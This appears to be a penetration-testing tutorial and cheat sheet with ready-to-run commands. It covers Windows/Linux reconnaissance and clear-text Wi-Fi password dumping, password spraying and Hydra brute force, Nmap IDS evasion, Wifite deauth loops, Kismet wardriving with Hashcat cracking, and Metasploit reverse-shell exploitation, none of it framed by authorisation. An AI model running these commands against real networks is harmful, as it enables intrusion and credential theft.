The PenTest Gold Mine - IT Pro Expert

When you need to do a true PenTest on a company and you need to simulate how a real hacker would go about things, this is your essential toolkit.

CMD/Terminal

Command Prompt and Terminal are actually useful in both Windows and Linux.

Windows Command Prompt options:

Commands to analyze a network, categorized by their phase in the testing process.

1. Initial Network & System Reconnaissance

Before scanning the wider network, you must understand the machine you are currently on and its immediate context.

ipconfig /all
- Why: Gives you the full picture: IP address, Subnet Mask, Gateway, and DNS servers. Look for multiple network adapters (e.g., a corporate LAN and a separate admin network).
systeminfo
- Why: Dumps OS version, hotfixes (patches), and hardware info. This is critical for finding privilege escalation vulnerabilities (like missing patches).
netstat -ano
- Why: Shows all active network connections and listening ports.
- Pentest Tip: Look for “ESTABLISHED” connections to see what other servers this machine talks to. Look for “LISTENING” ports on 127.0.0.1—these are internal services you might tunnel into later.
route print
- Why: Displays the routing table.
- Pentest Tip: Reveals hidden subnets. If you see a route to a 10.x.x.x network that isn’t your current subnet, you’ve found a path to pivot to another part of the network.

2. Discovering Other Hosts (Host Discovery)

Tools like Nmap are noisy and often blocked. You can use built-in tools to quietly find other machines.

arp -a
- Why: Shows the ARP cache (MAC addresses to IP mappings).
- Pentest Tip: This is the passive way to see who your neighbors are without sending a single packet. If a computer is in this list, your machine has recently talked to it.
ping -n 1 <Target_IP>
- Why: Tests connectivity to a specific host. -n 1 sends just one packet to be quicker and quieter.
The “Poor Man’s” Ping Sweep (One-Liner)
- Command:DOSfor /L %i in (1,1,255) do @ping -n 1 -w 100 192.168.1.%i | find "Reply"
- Why: This loops through all IPs from 1 to 255 (change 192.168.1 to your actual subnet). It’s a manual way to find live hosts without triggering Nmap alerts.

3. Enumerating Shares & Users

Once you know who is on the network, you need to know what they are sharing and who has access.

net view
- Why: Lists other computers in the current domain/workgroup.
- Note: Often blocked by modern Windows firewalls, but powerful when it works.
net view \\<ComputerName> /all
- Why: Lists all file shares on a specific remote computer.
- Pentest Tip: Look for non-standard shares like Backup, Docs, or Private which might be readable by Everyone.
net user /domain
- Why: Lists every user in the entire Domain (Active Directory).
- Pentest Tip: Pipe this to a file (> users.txt) to create a target list for password spraying attacks.
net group "Domain Admins" /domain
- Why: Shows you the “Keys to the Kingdom”—who are the Domain Admins? These are your high-value targets.

4. Wi-Fi & Credential Hunting

If you have physical access or a shell on a laptop, these commands can reveal clear-text secrets.

netsh wlan show profiles
- Why: Lists all Wi-Fi networks this computer has ever connected to (Corporate, Home, Coffee Shop).
netsh wlan show profile name="<SSID>" key=clear
- Why: Reveals the Wi-Fi password in clear text (look for the “Key Content” field).
cmdkey /list
- Why: Lists “Stored Credentials” for accessing other network resources.
- Pentest Tip: If you see credentials listed here, you might be able to use runas /savecred to execute commands as that user without knowing their password.

In Windows 10 and 11, you can dump all saved Wi-Fi passwords using the Command Prompt (cmd) without installing any third-party tools.

Here are the two best ways to do this:

Method 1: The “Bulk Export” (Creates Files)

This is the most reliable method. It commands Windows to grab every known Wi-Fi profile and save it as an individual .xml file in a folder of your choice. Each file will contain the password in plain text.

Open Command Prompt as Administrator (Search “cmd”, right-click, and choose Run as administrator).
Create a folder to store the passwords (e.g., in your C: drive):DOSmkdir c:\wifi-passwords
Run the following command to export all profiles to that folder:DOSnetsh wlan export profile folder=c:\wifi-passwords key=clear
Open the folder (c:\wifi-passwords) in File Explorer. You will see one XML file for each network.
Open any file with Notepad and look for the line that says <keyMaterial>. The text inside is the password.

Method 2: The “Screen Dump” Script (No Files)

If you just want to see all the passwords printed on your screen instantly without creating files, copy and paste this one-liner script directly into your Command Prompt window:

DOS

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles name=%j key=clear | findstr "Key Content"

What this does:

It loops through every Wi-Fi profile saved on your system.
It runs the “show password” command for each one automatically.
It filters the output to show only the password (Key Content).

Method 3: The “One-by-One” Manual Way

If you only need a specific password, you can use the standard command:

List all profiles to find the exact name:DOSnetsh wlan show profiles
Reveal the password for that specific network:DOSnetsh wlan show profile name="WiFi-Name-Here" key=clear (Look for “Key Content” in the output)

5. DNS Reconnaissance

nslookup (Interactive Mode)
- Why: Enter nslookup, then type set type=any and enter a domain name. It helps you map out the servers (Mail, Web, VPN) associated with the domain.

Summary Checklist for a Windows Network Audit

Command	Purpose
`ipconfig /all`	Who am I? (IP & DNS)
`arp -a`	Who are my neighbors? (Passive)
`netstat -ano`	Who am I talking to? (Active connections)
`route print`	Where else can I go? (Routing table)
`net user /domain`	Who can I attack? (User list)
`cmdkey /list`	Are there saved passwords?

Linux Terminal Options:

These commands use tools already built into Debian and Ubuntu to perform reconnaissance without installing noisy scanners like Nmap.

This is critical when you have compromised a Linux server (e.g., via SSH or a web shell) and need to look around the internal network without triggering the Intrusion Detection System (IDS) by downloading new software.

1. Initial Network & Interface Recon

Before you scan the network, understand the machine you are standing on. Modern Linux uses the ip command (part of iproute2) instead of the old ifconfig.

ip a (or ip addr)
- Why: Shows all network interfaces.
- Pentest Tip: Look for docker0 or tun0 interfaces. If you see them, this machine is connected to other internal networks (containers or VPNs) that you can pivot into.
ip route
- Why: Shows the routing table (where traffic goes).
- Pentest Tip: Look for lines that do not say default via. These reveal hidden internal subnets (e.g., 10.10.x.x) that are reachable from this machine but not exposed to the public internet.
cat /etc/resolv.conf
- Why: Shows the DNS servers.
- Pentest Tip: In corporate networks, the DNS server is often the Active Directory Domain Controller. If you see nameserver 192.168.1.5, that IP is likely the “Boss” of the network.

2. Living off the Land: Host Discovery

If you don’t have Nmap, use these built-in methods to find other active computers.

ip neigh (Modern replacement for arp -a)
- Why: Shows the ARP cache (Neighbors).
- Pentest Tip: It lists machines your computer has recently talked to. REACHABLE means it’s currently online. STALE means it was there recently.
The “Bash” Ping Sweep (One-Liner)
- Command:Bashfor i in {1..254}; do (ping -c 1 -W 1 192.168.1.$i | grep "bytes from" &); done
- Why: This runs a ping against every IP in the subnet in parallel (backgrounded). It is much faster than running them one by one.
- Note: Replace 192.168.1 with your actual subnet.

3. Enumerating Listening Ports (Port Recon)

You need to see what services are running on the current machine and what it is connected to.

ss -antup (The modern, faster netstat)
- Why: Displays all numeric tcp/udp processes.
- Pentest Tip:
  - Local Address 127.0.0.1:3306: A database (MySQL) is running locally but blocked from the outside. You might be able to access it now that you are “inside” the box.
  - Foreign Address: If you see an established connection to port 443 on a strange IP, this server might be talking to a cloud API or an internal admin dashboard.
lsof -i -P -n
- Why: Lists “Open Files” (Network connections are files in Linux).
- Pentest Tip: Sometimes clearer than ss. It shows exactly which binary (e.g., python, nginx) holds the port open.

4. User & Persistence Hunting

Who else is here, and what can they do?

w or who
- Why: Shows who is logged in right now.
- Pentest Tip: If you see root logged in on pts/0, be careful. The admin is currently online and might see your commands.
cat /etc/passwd | grep "sh$"
- Why: Lists all users, but filters for those with a shell (like /bin/bash).
- Pentest Tip: Ignores the “boring” service accounts (like nobody, sys) and shows you the real human users or service accounts you can actually log into.
history
- Why: Shows the last commands typed by the user.
- Pentest Tip: This is a goldmine. Admins often type passwords directly into commands (e.g., mysql -u root -pPassword123) or paste API keys. Always check this first.
sudo -l
- Why: Lists what sudo commands your current user can run.
- Pentest Tip: If it says (ALL) NOPASSWD: /usr/bin/python, you have just won the game. You can use Python to spawn a root shell instantly.

5. “Poor Man’s” Port Scanner (Bash)

If you need to scan a specific remote server (e.g., 192.168.1.50) for open ports but don’t have Nmap or Netcat (nc), use Linux’s built-in file descriptors.

Check a single port (e.g., Port 80):Bash(echo > /dev/tcp/192.168.1.50/80) >/dev/null 2>&1 && echo "Open" || echo "Closed"
- How it works: Linux treats network connections like files. If it can “write” to the path /dev/tcp/IP/PORT, the port is open.

Summary Cheat Sheet (Debian/Ubuntu)

Command	Purpose
`ip a`	Interface & IP info (look for `docker0`)
`ip neigh`	Who are my neighbors? (ARP table)
`ss -antup`	What ports are open/listening?
`ps aux --sort=-%mem`	What software is running? (Top RAM users)
`history`	CRITICAL: Did the admin type a password?
`find / -perm -4000`	Find SUID binaries (Privilege Escalation)

Next Step:

If you have access to a Linux terminal right now, run ss -antup and look at the “Local Address” column. Do you see anything listening on 127.0.0.1 that you didn’t know was there?

Nmap

Function: Scans networks to find open ports, discover services, and identify operating systems and weak spots.

Here is the ultimate Nmap cheat sheet designed specifically for company reconnaissance.

This is structured by Phase of Engagement, moving from “Is anyone home?” to “What exactly is running and how do I exploit it?”

🛡️ Pre-Requisites

Run as Root: Most advanced scans (SYN, OS detection) require sudo.
Timing: -T4 is the standard for modern broadband/LANs. Use -T2 or -T1 if you need to be stealthy or evade IDS.

Phase 1: Host Discovery (The “Who is Alive?” Scan)

Goal: Find live IP addresses without wasting time scanning ports on dead hosts.

Command	Description
`nmap -sn 192.168.1.0/24`	Ping Scan. No port scan. Just tells you which IPs are up.
`nmap -sn -n 192.168.1.0/24`	No DNS Resolution. Faster. Prevents reverse DNS lookups that slow you down.
`nmap -PU -sn 192.168.1.0/24`	UDP Ping. Good for bypassing firewalls that block standard ICMP (Ping).
`nmap -iL targets.txt -sn`	Scan from List. Scans a list of IPs contained in a text file.

Phase 2: Port Discovery (The “What Doors are Open?” Scan)

Goal: Identify open ports (TCP & UDP) on the live hosts found in Phase 1.

Command	Description
`nmap -sS -p- <IP>`	SYN Scan (Stealth). The standard. Fast, doesn’t complete the TCP handshake. Scans ALL 65,535 ports (`-p-`).
`nmap -sT <IP>`	Connect Scan. Use this if you are not root or are pivoting through a proxy. Noisier.
`nmap -sU <IP>`	UDP Scan. Crucial for corporate envs (DNS, SNMP, DHCP). Warning: Very slow.
`nmap --top-ports 100 <IP>`	Top 100. Quick scan of only the most common ports. Good for initial quick wins.

Phase 3: Service & OS Enumeration (The “What Version?” Scan)

Goal: Determine exactly what software and version is running on those open ports.

Command	Description
`nmap -sV <IP>`	Version Detection. Probes open ports to determine service info (e.g., Apache 2.4.49).
`nmap -O <IP>`	OS Detection. Guesses the Operating System based on IP stack behavior.
`nmap -A <IP>`	“Aggressive” Scan. Enables OS detection, Version detection, Script scanning, and Traceroute. (Loud).
`nmap -sV --version-intensity 5 <IP>`	Aggressive Versioning. 0 (light) to 9 (try every probe). Default is 7.

Phase 4: Nmap Scripting Engine (NSE) (The “Vuln” Scan)

Goal: Use Lua scripts to automate vulnerability discovery and advanced recon.

Command	Description
`nmap --script=default <IP>`	Runs the default “safe” scripts (basic info gathering).
`nmap --script=vuln <IP>`	Vulnerability Scan. Checks for known CVEs (e.g., EternalBlue, Heartbleed).
`nmap --script=http-enum <IP>`	Web Recon. Enumerates common folders/files on web servers (like Dirbuster light).
`nmap --script=smb-os-discovery <IP>`	SMB Recon. Essential for Active Directory. Pulls hostname, domain name, and Windows version.
`nmap --script=ftp-anon <IP>`	Checks for Anonymous FTP login allowed.

Phase 5: Firewall Evasion (The “Sneaky” Scan)

Goal: Get results even if there is a firewall or IDS/IPS in the way.

Command	Description
`nmap -f <IP>`	Fragment Packets. Splits packets into 8-byte chunks to confuse simple firewalls.
`nmap -D RND:10 <IP>`	Decoys. Sends packets from your IP and 10 random fake IPs. Hides your real IP in the noise.
`nmap --source-port 53 <IP>`	Source Port Spoof. Pretends your traffic is coming from Port 53 (DNS), which firewalls often allow.
`nmap --mtu 24 <IP>`	MTU Manipulation. Manually set the packet size (must be multiple of 8).

Phase 6: Output & Documentation (The “Save Your Work” Scan)

Goal: Never run a scan without saving the results.

Command	Description
`nmap -oA my_scan <IP>`	Output All. Saves in 3 formats: `.xml` (for tools), `.nmap` (human readable), `.gnmap` (grepable).
`nmap -oN scan.txt <IP>`	Normal. Saves standard output to a text file.

🏆 The “Pro” Workflow (Example)

1. Fast Discovery (Find the targets)

Bash

sudo nmap -sn -n 192.168.10.0/24 -oG live_hosts.txt

2. Detailed Scan (Scan ONLY the live hosts)

Extract IPs from the live_hosts.txt file first using awk or grep, then:

Bash

sudo nmap -sS -p- -sV -O -iL target_ips.txt -oA full_audit

3. Targeted Vulnerability Scan (If you found Port 445/SMB)

Bash

nmap -p 445 --script=smb-vuln* -iL target_ips.txt -oN smb_audit.txt

💡 Quick Reference Tags

-n: Never do DNS resolution (SPEED UP).
-Pn: Treat all hosts as online (Skip ping). Use this if Windows Firewalls are blocking Pings.
-vv: Double Verbose. Show me everything happening in real-time.
--open: Only show me open ports (hide closed/filtered).

Nuclei

A great vulnerability scanner that works on websites and useful for some good quick local LAN network scans.

Its fast – If you want to find the “new stuff” (Log4j, zero-days) fast without scanning for hours, Nuclei is currently the community favourite.

It is significantly faster than Nessus/OpenVAS. It uses community-powered templates that are often updated within hours of a new CVE being released. Its best for bug bounty hunting, web application scanning, and checking for specific high-profile vulnerabilities across many assets.
Nuclei isn’t the best report based “compliance” scanner but you can also just use AI to turn the results into a report.

Nuclei can authenticate into web apps, spider complex JavaScript sites, and find logic flaws that Nessus will miss. It is fully open-source and actively maintained which is best for testing your website, API, or web application for OWASP Top 10 vulnerabilities (SQLi, XSS).

There are advantages to both systems:

Feature	OpenVAS / Nessus	Nuclei
Patch Checking	Yes. It checks version numbers against a massive database of 100k+ CVEs.	Mostly No. It only checks if there is a working exploit template for it.
Authenticated Scanning	Yes. It can log into Windows/Linux to check installed software.	No. It generally scans from the outside looking in (Blackbox).
Web Applications	Poor. It is bad at understanding modern websites.	Excellent. It finds specific web bugs (XSS, SQLi, exposed panels) very well.
Legacy Stuff	Great. Finds old printer vulnerabilities or Windows XP bugs.	Weak. The community doesn’t write templates for old, boring bugs.

The LAN network ability of Nuclei will scan for all of the SMB, SQL, SSH, etc essentials.

Install Nuclei on Kali Linux and run the installer like this:

sudo apt install nuclei
nuclei -update-templates

nuclei -ut

Kali locks you into a stable release which will flag as outdated but it still works perfectly as the templates are the key to the operation.
You can check for updates like this: (The usual command for updates is nuclei -up but it won't work on Kali)
sudo apt update && sudo apt install --only-upgrade nuclei

Or run this occasionally along with the templates update:
sudo apt upgrade nuclei

The Nuclei cheat sheet:

How to scan network blindly but this is not advised as it will take ages and check for web vulnerabilities too:
nuclei -u 192.168.1.0/24

How to scan network the smart way which includes SSH,FTP,SMB,Redis,etc.
nuclei -u 192.168.1.0/24 -tags network
or to save results to text file:
nuclei -u 192.168.1.0/24 -tags network -o results.txt
see results with:
cat results.txt
or for JSON results best for reporting:
nuclei -u 192.168.1.0/24 -tags network -je results.json
see JSON results with or get AI to convert to a report:
cat results.json | jq

To see the debug of how a vulnerability is found use this:
nuclei -u https://example.com -d

The fastest and best approach is to do a Nmap scan first and work from that file:
nmap -sS -p- 192.168.1.0/24 -oG - | awk '/Up$/{print $2}' > live_hosts.txt
nuclei -l live_hosts.txt

To target something specific like SMB use these examples - first is single IP next is full network:
nuclei -u 192.168.1.15 -tags smb
nuclei -u 192.168.1.0/24 -tags smb,network

To test for SQL injection:
nuclei -u https://example.com -tags sqli

To test for DB services on 3306,1433,5432:
nuclei -u 192.168.1.15 -tags mysql,mssql,postgres

To Scan a Website generally:
nuclei -u https://example.com -o web_scan.txt

To Scan a WordPress website:
nuclei -u https://example.com -tags wordpress -o wp_scan.txt

TO Scan Everything:
nuclei -u https://example.com -tags cve,misconfig,tech,wordpress,exposed-panels -o full_scan.txt

To Rate Limit:
-rl 50: Rate Limit (Max 50 requests per second).
-c 5: Concurrency (Only 5 checks at a time).
-timeout 5: Gives up if the server takes longer than 5 seconds
nuclei -u https://example.com -rl 50 -c 5 -timeout 5 -o safe_scan.txt

Here is the go to method for network scans:

nmap -sn 192.168.1.0/24 -oG - | awk '/Up$/{print $2}' > live_hosts.txt
nuclei -l live_hosts.txt -tags network,cve,os -je results.json
cat results.json | jq

Wifite

The easiest way to pentest the WiFi network. If this breaks it in minutes, you need to rethink your WiFi strategy.

Start with a WiFi device that allows for monitoring mode like the Alfa AWUS036NHA (Atheros AR9271).

Here is the streamlined, step-by-step workflow from Wifite to Hashcat.

Phase 1: The Capture (Using Wifite)

Wifite is the “easy button.” It will handle putting your card into Monitor Mode, scanning, and capturing the handshake automatically.

1. Kill interfering processes Before you start, kill the background processes (like NetworkManager) that might interfere with the card.

Bash

sudo airmon-ng check kill

2. Run Wifite Run this command. Wifite will automatically detect your Alfa card.

Bash

sudo wifite --kill

or advanced auto scans

sudo wifite --kill --pmkid

or for faster results

sudo wifite --kill --wpa --pmkid --no-wps

#The infinite rescan and pwn bash script - attack for 45 sec and restart after 5 sec sleep.

while true; do sudo wifite --kill --pmkid --no-wps; sleep 5; done

What happens now:
1. Wifite will start scanning for networks.
2. Wait until you see your target network appear in the list.
3. Press Ctrl + C to stop scanning.
4. Wifite will ask you to select a target number (e.g., 1, 2, 3). Type the number of your target and hit Enter.
5. Wifite will launch the attack (de-authenticating clients) and wait for the “Handshake.”
6. Once captured, it will save the file to the hs/ (handshake) directory.

Note: Since you are using the NHA, you will only see 2.4GHz networks.

Alfa WiFi Card Not Working in Kali? Troubleshoot Drivers for Alfa AWUS036ACH, Alfa AWUS036ACM & Alfa AWUS036NHA adapters:

If no card shows up make sure the drivers are installed:
Also try a REBOOT before even doing any of this.

sudo apt update
sudo apt upgrade -y
sudo apt dist-upgrade -y
sudo reboot now
sudo apt update
sudo apt install firmware-atheros
sudo apt install realtek-rtl88xxau-dkms
sudo apt install dkms
sudo apt-get install bc mokutil build-essential libelf-dev linux-headers-`uname -r`
git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git
cd rtl8812au/
make
sudo make install
lsusb
iwconfig



For setting monitor mode

Fix problematic interference in monitor mode.
$ airmon-ng check kill
You may also uncheck the box "Automatically connect to this network when it is available" in nm-connection-editor. This only works if you have a saved wifi connection.

Set interface down
$ sudo ip link set wlan0 down
Set monitor mode
$ sudo iw dev wlan0 set type monitor
Set interface up
$ sudo ip link set wlan0 up
For setting TX power

$ sudo iw wlan0 set txpower fixed 3000

Phase 2: The Conversion (Critical Step)

Wifite usually saves files as .cap. Modern Hashcat cannot read .cap files directly. You must convert the file to the modern .hc22000 format.

Option A: The Terminal Way (Best Practice) Kali has a built-in tool for this.

Bash

# Syntax: hcxpcapngtool -o [Output_Filename] [Input_Wifite_File]

hcxpcapngtool -o hash.hc22000 hs/your_capture_file.cap

Replace your_capture_file.cap with the actual filename Wifite created.

Option B: The Lazy Web Way If the command above is annoying, upload your .cap file to hashcat.net/cap2hashcat. It will convert it and let you download the .hc22000 file.

Phase 3: The Cracking (Using Hashcat)

Now we use the GPU to crack the password using the rockyou.txt wordlist.

1. Prepare the Wordlist (Do this once) Kali compresses the famous “Rockyou” wordlist by default. You need to unzip it.

Bash

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

(If it says “No such file,” it means you already unzipped it. Proceed to the next step.)

2. Run Hashcat Here is the magic command.

Bash

# Syntax: hashcat -m 22000 [Hash_File] [Wordlist]

hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

-m 22000: This tells Hashcat “This is a WPA2 handshake.”
hash.hc22000: This is the file you created in Phase 2.
rockyou.txt: This is the list of 14 million common passwords.

Summary Checklist

sudo wifite --kill (Capture the handshake).
hcxpcapngtool -o hash.hc22000 hs/capture.cap (Convert to Hashcat format).
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt (Crack it).

What to expect: If the password is weak (e.g., “password123”, “liverpool”), Hashcat will crack it in seconds. If it is a complex random string (e.g., “G7#k9!pL”), rockyou.txt will likely fail, and you will need a better strategy or a brute-force attack.

Bettercap

The Auto-Pwn Script (Recon + Handshake + GPS)

Inside Bettercap, type these commands to replicate Wifite’s behavior while logging GPS:

Bash

# 1. Start WiFi Recon (Scanning)
wifi.recon on

# 2. Set it to hop channels (so you see everything)
wifi.recon.channel 1,6,11

# 3. Show networks with GPS info
net.show

# 4. Automate the Handshake Capture (Optional)
# This module automatically sends Deauths to capture handshakes
wifi.assoc.auto on

Where is the data? Bettercap saves a bettercap-wifi-handshakes.pcap file. Since gps.on is running, the location data is metadata that can be correlated, or you can use events.stream to log it to a file.

Summary

Tool	Can Auto-Attack?	Can Log GPS?	Best For…
Wifite	✅ Yes	❌ No	Fast, stationary attacks.
Kismet	⚠️ Mostly Passive	✅ Yes	Mapping an entire city (Wardriving).
Bettercap	✅ Yes	✅ Yes	The modern all-in-one alternative.

If you need to do this over a wide area or for a long time try Kismet.

Kismet

workflow for Kismet on Kali Linux, specifically tailored for your Alfa adapter and GPS dongle.

Phase 1: The Setup (Do this once)

You need to install Kismet and the GPS daemon.

Install the ToolsBashsudo apt update sudo apt install kismet gpsd gpsd-clients python3-gps
- During installation, if it asks to add your user to the “kismet” group, select YES. This allows you to run it without sudo later (though sudo is fine for now).
Prep your GPSPlug in your GPS dongle. We need to tell Linux to read from it.
- Find your GPS device ID (usually /dev/ttyUSB0 or /dev/ttyACM0):Bashls /dev/tty*
- Start the GPS service:Bashsudo gpsd -n /dev/ttyUSB0 -F /var/run/gpsd.sock
- Verify it works: Run cgps -s. If you see coordinates, you are ready. (Press Ctrl+C to exit).

Phase 2: Launching Kismet

Kismet is unique: it runs a Server in your terminal, but you view the Interface in your Web Browser.

Plug in your Alfa Card You do not need to put it in monitor mode manually (airmon-ng). Kismet will do this for you automatically.
Start the Kismet ServerRun this command in your terminal:Bashsudo kismet
Open the Dashboard
- Leave the terminal running.
- Open Firefox (or any browser) and go to:👉 http://localhost:2501
Log In
- On the first run, it will ask you to create a username and password. Make it something simple (e.g., admin / password).

Phase 3: Configuring the Scan

Now you are in the “Cockpit.” You need to turn on your radios.

Enable the Alfa Card
- Click the Hamburger Menu (≡) (top left) -> Data Sources.
- You should see your Alfa card (e.g., wlan0 or wlan1).
- Click Enable.
- Note: Kismet will now start hopping channels and populating the list.
Enable GPS
- It should auto-detect the gpsd service we started earlier.
- Look at the top right of the dashboard. If the Target Icon is green, you have a GPS lock. If it’s red/orange, checking the gpsd connection.

Phase 4: The Drive

Now you just drive. Kismet will automatically:

Log every Access Point it passes.
Log the GPS coordinates of where you saw it.
Capture Handshakes automatically if a device happens to connect while you are nearby (Passive Capture).

How to check for Handshakes:

In the Dashboard, type handshake in the search bar.
Or look for the “WPA Handshake” icon next to a network name.

Phase 5: Exporting & Cracking

When you are done driving, stop Kismet (Ctrl+C in the terminal).

You will find a huge file in your home folder named something like Kismet-20251125-120000-1.kismet.

1. Convert the Log to Hashcat Format

Kismet saves everything in a database file. You need to extract the handshakes.

Bash

# Syntax: hcxpcapngtool -o [Output_Hash_File] [Input_Kismet_File]
hcxpcapngtool -o my_hashes.hc22000 Kismet-*.kismet

2. Crack the Hashes

Now feed that file to Hashcat just like before:

Bash

hashcat -m 22000 my_hashes.hc22000 /usr/share/wordlists/rockyou.txt

Summary Cheat Sheet

Action	Command / Step
Start GPS	`sudo gpsd -n /dev/ttyUSB0 -F /var/run/gpsd.sock`
Start Kismet	`sudo kismet`
View UI	Browser -> `http://localhost:2501`
Enable Card	Menu -> Data Sources -> Enable `wlan1`
Convert Log	`hcxpcapngtool -o hashes.hc22000 *.kismet`

Pro Tip: If you want to visualize where you drove, you can upload your .kismet file to Wigle.net, and it will map all the WiFi networks you found on a world map.

OpenVAS Greenbone

The ultimate free LAN network vulnerability scanner.

Getting OpenVAS (now officially called GVM – Greenbone Vulnerability Management) running on Kali can be tricky because it is a massive suite of tools (Scanner, Manager, Database, Web UI) that all have to talk to each other perfectly.

Here is the tested, step-by-step guide to installing it on Kali Linux (2024/2025).

Phase 1: The “Clean” Installation

Do not skip the update step. GVM relies on specific versions of PostgreSQL, and mismatched versions are the #1 cause of failure.

Update your system thoroughly:Bashsudo apt update && sudo apt dist-upgrade -y (If this updates a lot of packages, reboot your computer before continuing.)
Install the GVM suite:Bashsudo apt install gvm -y
Run the Setup Script: This script is the “magic button.” It downloads the vulnerability feeds (NVTs, CERT, SCAP), creates the database, and sets up certificates.Bashsudo gvm-setup
- Warning: This will take a long time (15–60 minutes depending on your internet).
- CRITICAL: At the very end of this process, it will print a super long password for the admin user. Copy and paste this into a notepad immediately.

Phase 2: The “Sanity Check”

Before trying to run it, use the built-in diagnostic tool to see if it actually works.

Check the setup:Bashsudo gvm-check-setup
Read the output:
- If it says It seems like your GVM installation is OK: You are golden. Proceed to Phase 3.
- If it gives an ERROR: It will usually give you a “FIX” command right below the error. Copy and paste that FIX command, run it, and then run gvm-check-setup again.

Phase 3: Accessing the GUI

OpenVAS runs a web server on your local machine.

Start the services:Bashsudo gvm-start (Note: It might open your browser automatically. If not, wait 30 seconds for the services to spin up.)
Log in:
- URL: https://127.0.0.1:9392
- User: admin
- Password: (The one you copied earlier).
Forgot the password? Reset it with this command:Bashsudo runuser -u _gvm -- gvmd --user=admin --new-password=YourNewPassword

Phase 4: How to Run Your First Scan

The interface (Greenbone Security Assistant) is not intuitive. Here is the workflow:

Create a Target (The IP you want to scan):
- Go to Configuration > Targets.
- Click the Paper/Star Icon (Top Left) to create a new target.
- Name: My Home Network
- Hosts: 192.168.1.0/24 (or a specific IP like 192.168.1.50).
- Click Save.
Create a Task (The actual job):
- Go to Scans > Tasks.
- Click the Paper/Star Icon.
- Name: Full Scan of Home
- Scan Target: Select My Home Network (the one you just made).
- Scan Config: Full and Fast (Standard) or System Discovery (Faster, less deep).
- Click Save.
Start the Scan:
- On the Tasks page, find your new task.
- Click the Play Button (▶) under the “Actions” column.
- The status will change to “Requested” -> “Queued” -> “Running”.
- Note: OpenVAS is SLOW. A full scan of one host can take 20–60 minutes.

Troubleshooting Common Errors

1. “PostgreSQL Version” Error during setup

The Cause: Kali updated Postgres to v17, but GVM is looking at v16 (or vice versa).
The Fix: You need to confirm which version GVM wants (read the error message) and make sure that version is running on port 5432.
- Edit the config: sudo nano /etc/postgresql/17/main/postgresql.conf (replace 17 with your version).
- Find port = 5433 and change it to port = 5432.
- Restart Postgres: sudo systemctl restart postgresql.

2. “Feed Status” is empty / Scan finds 0 vulnerabilities

The Cause: Your database downloaded the empty skeletons but didn’t fill them with data.
The Fix: Force a manual sync.Bashsudo greenbone-feed-sync (Then wait 20 minutes and check gvm-check-setup again).

3. “Failed to find config” error

The Cause: You tried to scan before the feeds were finished downloading.
The Fix: Wait. Seriously. OpenVAS downloads data in the background even after the setup script finishes. Check Administration > Feed Status in the web UI. If it says “Update in progress,” do not scan yet.

Here is the Metasploit Framework (MSF) cheat sheet re-typed with a clearer layout to ensure readability. I have broken it down by the specific phase of the attack.

1. Metasploit Framework (MSF)

The “Swiss Army Knife” for exploitation. It manages your hacks, database, and active sessions.

Phase 1: Setup & Database

Crucial step: If you don’t initialize the database, Metasploit is slow and won’t save your results.

Initialize the Database (Run once on new install)Bashsudo msfdb init
Launch the ConsoleBashmsfconsole
Check Database StatusBashdb_status (Should return: “Connected to msf. Connection type: postgresql”)
Create a Workspace (Keeps data for different clients separate)Bashworkspace -a Target_Company_Name

Phase 2: The Attack Workflow

The standard loop you will repeat for every exploit.

1. Search for an exploit You can search by CVE year, platform, or app name.

Bash

search type:exploit name:smb

2. Select the exploit Use the number listed in the search results (e.g., 0, 1, 2).

Bash

use 0

3. Configure the Target (RHOSTS) Tell Metasploit who you are attacking.

Bash

show options
set RHOSTS 192.168.1.15

4. Configure Yourself (LHOST) Tell Metasploit where to send the reverse shell (your VPN or LAN IP).

Bash

set LHOST tun0

(Note: tun0 is usually your VPN interface. Use eth0 if on a local LAN).

5. Verify Vulnerability (Optional) Checks if the target is actually vulnerable without crashing it.

Bash

check

6. Fire!

Bash

exploit

Phase 3: Session Management (Post-Exploitation)

Once you hack a machine, you get a “Session”. Do not lose it.

List all active hacks/shellsBashsessions -l
Enter a specific session (Swap 1 for the ID number)Bashsessions -i 1
Background a session (Go back to main menu without killing the hack)
- Press Ctrl + Z then y
- OR type:
Bashbackground
Upgrade a basic shell to Meterpreter If you caught a dumb command shell, use this to upgrade it to a powerful one.Bashsessions -u 1

💡 Pro Tip: The “Local Exploit Suggester”

If you have a shell on a machine but you are a low-level user (not Admin/Root), run this inside Meterpreter to find ways to become Root.

Get a session.
Background it (background).
Run the suggester:Bashuse post/multi/recon/local_exploit_suggester set SESSION 1 run

2. Hydra

The “Brute Forcer.” Use this when you find a login page or service (SSH, FTP, RDP).

Syntax: hydra -l <user> -P <passlist> <IP> <protocol>

Protocol	Command Example
SSH	`hydra -l root -P rockyou.txt 192.168.1.10 ssh`
FTP	`hydra -l admin -P rockyou.txt 192.168.1.10 ftp`
RDP (Windows)	`hydra -l Administrator -P rockyou.txt 192.168.1.10 rdp`
Web Login (GET)	`hydra -l admin -P rockyou.txt 192.168.1.10 http-get /admin`
Web Login (POST)	Complex. Requires finding the specific parameters (user=, pass=) and error message. `hydra -l admin -P rockyou.txt 10.10.10.5 http-post-form "/login.php:user=^USER^&pass=^PASS^:Login Failed"`

Key Flags:

-l / -L: Single username / List of usernames.
-p / -P: Single password / List of passwords.
-t 4: Threads (speed). Don’t go too high (e.g., 64) or you will crash the service. 4 is safe.

3. Web Enumeration (Gobuster / Ffuf)

The “Directory Busters.” Use these to find hidden folders (e.g., /admin, /backup) that aren’t linked on the homepage.

Option A: Gobuster (The User-Friendly Standard)

Best for: Standard directory and DNS busting.

Action	Command
Dir Scan	`gobuster dir -u http://192.168.1.10 -w /usr/share/wordlists/dirb/common.txt`
File Ext	`gobuster dir -u http://10.10.10.10 -w common.txt -x php,txt,html` (Finds index.php, notes.txt)
DNS Subdomains	`gobuster dns -d target.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million.txt`

Option B: Ffuf (The “Fast” Advanced Tool)

Best for: Speed, fuzzing parameters, and complex filtering.

Action	Command
Basic Scan	`ffuf -u http://192.168.1.10/FUZZ -w wordlist.txt`
Recursion	`ffuf -u http://192.168.1.10/FUZZ -w wordlist.txt -recursion` (Scans sub-folders automatically).
